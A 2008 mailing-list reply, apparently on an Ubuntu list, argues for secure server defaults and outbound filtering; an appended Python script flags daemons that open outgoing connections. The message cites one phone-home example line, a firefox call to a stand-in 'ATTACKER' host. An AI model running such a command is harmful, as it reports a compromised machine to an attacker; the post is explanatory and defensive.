Disappointed with Ubuntu Server, could be used by such a wider audience

John McCabe-Dansted gmatht at gmail.com
Sun Aug 3 02:40:42 UTC 2008


On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <macoafi at gmail.com> wrote:
> Because as he said, if you pre-configure everything to
> super-duper-easy-peasy, you've also pre-configured it to
> super-duper-easy-peasy-to-crack.  I'm personally disappointed by
> firewalls that allow outbound by default, because something could phone
> home if I put my trust in an application I shouldn't, but they're
> easy-peasy for users, so that's what people do.  I can manually go
> through and fix it myself, but if some application is running about
> opening who knows how many ports and setting god-knows-what services to
> auto-start and mucking about with insecure options in config files...how
> many months is it going to take me to track all of that down?  No way.

Commercial Windows firewalls pretty much all block outbound traffic by
default, popping up a dialog box offering to allow that particular
application to access the internet. I understand that it is fairly
easy for an attacker to phone home though. For example, just run
firefox http://ATTACKER/this-machine-is-cracked.

However, if it is good practice to prevent e.g. httpd making outgoing
connections, this should be done by default. It is fairly easy to do
this with e.g. systrace.

The argument that it is hard to set up these systems to be secure
seems to be an argument that they should be secured once, by Ubuntu,
with a great deal of scrutiny on whether the configuration really is
secure.  Even if we assume that everyone will hire a UNIX guru we
can't assume that all the "gurus" really are gurus or that they won't
forget one tiny exploit.

Ubuntu desktop already has one server function. I can right click a
file, go to share and share the folder using samba. If you know of any
security flaws with this GUI, please report a bug.

-- 
John C. McCabe-Dansted
PhD Student
University of Western Australia
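
An added example, not part of the original message: a check for the policy discussed above (a server such as httpd should not make outgoing connections), done as detection over `ss -tanp` output rather than as enforcement with systrace. The sample output, process names and daemon list are constructed for illustration.

```python
import re

# Constructed sample of `ss -tanp` output (documentation address ranges).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("apache2",pid=1200,fd=4))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=800,fd=3))
ESTAB 0 0 192.0.2.10:80 198.51.100.7:51234 users:(("apache2",pid=1234,fd=12))
ESTAB 0 0 192.0.2.10:43512 203.0.113.5:80 users:(("apache2",pid=1234,fd=13))
ESTAB 0 0 192.0.2.10:22 198.51.100.9:40022 users:(("sshd",pid=901,fd=3))
ESTAB 0 0 [2001:db8::10]:51000 [2001:db8::99]:443 users:(("firefox",pid=2500,fd=40))
"""

PROC_RE = re.compile(r'\(\("([^"]+)",pid=\d+')


def parse(text):
    """Yield (state, local_port, peer, process_name) for each socket line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # blank line or socket without process information
        m = PROC_RE.search(" ".join(fields[5:]))
        if not m:
            continue  # header line, or process not visible (needs root)
        # rsplit keeps bracketed IPv6 addresses intact: "[::1]:80" -> "80"
        local_port = fields[3].rsplit(":", 1)[1]
        yield fields[0], local_port, fields[4], m.group(1)


def outbound_from_daemons(text, daemons):
    """Return (process, peer) for connections that a listed daemon initiated.

    Heuristic: a connection accepted by a server keeps the server's
    listening port as its local port, so an established socket whose local
    port is not one the daemon listens on was opened by the daemon itself.
    """
    rows = list(parse(text))
    listening = {(name, port) for state, port, _, name in rows
                 if state == "LISTEN"}
    return [(name, peer) for state, port, peer, name in rows
            if state == "ESTAB" and name in daemons
            and (name, port) not in listening]


if __name__ == "__main__":
    for name, peer in outbound_from_daemons(SAMPLE_SS, {"apache2", "sshd"}):
        print(f"{name} has an outgoing connection to {peer}")
```
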



